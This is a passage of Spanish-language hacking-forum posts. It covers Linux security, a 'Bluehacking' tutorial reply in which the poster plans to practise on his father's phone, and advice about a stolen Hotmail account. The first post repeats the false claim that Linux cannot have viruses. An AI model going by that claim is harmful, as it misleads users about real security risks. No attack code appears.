El hecho, sin embargo, es que en Linux no hay ni habrá virus, (la verdad es que en ningún sistema operativo deberían de existir los virus), la razón radica en la gestión de memoria y la asignacion de permisos por omisión, los cuales hacen imposible que un programa no autorizado se ejecute y propague. Varias consultoras reportan que los servidores mas atacados en Internet son los basados en Linux, y la gran mayoria sale victorioso de la prueba. Sin embargo, esto no significa que este sistema operativo sea invulnerable: los programas y el mismo kernel poseen fallas que al ser explotadas permiten que, en casos extremos, un extraño tome control del equipo. La mejor manera de prepararse para un ataque es siendo uno mismo un hacker, escaneando los puerto de nuestro server, inyectando SQL en nuestras paginas web y tratando de ejecutar codigo malicioso. Lo más importante es frecuentar sitios que informen sobre fallos de seguridad, como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y buscar actualizaciones para nuestro sistema cada siete dias. Existen muchas soluciones que automatizan este proceso."
Espero que no queden dudas!
fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#19
Phreak / Re:El Bluehacking By_xassiz
Noviembre 21, 2011, 08:15:56 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
como lo descargo??
men hehejeje solo copealo un copy & paste en un archvio word o cualquier editor de textos jeje y ANTRA buen tuto cuando tenga el cel de mi padre practicare ya que el mio es un bocho xDD
#20
Dudas y pedidos generales / Re:Como recuperar cuenta de hotmail robada
Noviembre 21, 2011, 06:14:57 PM
Bueno amigo en SI no hay ningun programa que exista para recuperar tu correo u contraseña y si alguna persona te ofrece algo parecido te lo digo desde ahora que no te vallas en el engaño ok y acerca de recuperarlo bueno pues dices que tienes una cuenta vinculada pero no te acuerdas su contra pues intenta recordarla men, has memoria hasta que te explote la mente y acerca lo de soporte pues tienes que hacer muy bien los pasos para que el servicio te ayude ya que ellos son muy serios ok bueno espero haberte ayudado men yo se que no eras lo que buscabas pero no creo que encuentre resultado a esa solucion a menos que te suceda un milagro grande xD bueno salu2 men !
